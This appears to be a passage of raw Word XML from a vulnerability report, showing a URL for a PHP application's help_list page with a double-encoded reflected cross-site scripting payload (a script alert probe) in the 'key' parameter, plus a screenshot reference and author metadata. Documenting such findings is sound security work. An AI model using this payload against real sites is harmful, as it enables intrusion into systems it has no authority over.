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0F25" w14:textId="03ECE729" w:rsidR="00612465" w:rsidRDefault="00612465">
      <w:r w:rsidRPr="00612465">
        <w:t>Enter payload directly in the URL field:/index.php?m=&amp;c=help&amp;a=help_list&amp;key=137244gq1lw%253cscript%253ealert%25281%2529%253c%252fscript%253edutvxlqd4lq&amp;__hash__=d7aa5a382f14d270c3ac4de8392b4e1d_a34adb2b339972672eb447276f69ee88</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="6C876524" w14:textId="65B7E076" w:rsidR="001B2C71" w:rsidRDefault="00612465">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="374143CB" wp14:editId="4E81EA6C">
            <wp:extent cx="5274310" cy="2906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3"/>
    <w:rsid w:val="001B2C71"/>
    <w:rsid w:val="003F30C3"/>
    <w:rsid w:val="0061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FDCF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{69F98FE6-451E-40E3-8276-BAA5C5CA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Travis.Odom.1436@mail.linnbenton.edu</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Travis.Odom.1436@mail.linnbenton.edu</cp:lastModifiedBy>
  <cp:revision>2</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-03-09T02:28:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-03-09T02:28:00Z</dcterms:modified>
</cp:coreProperties>
</file>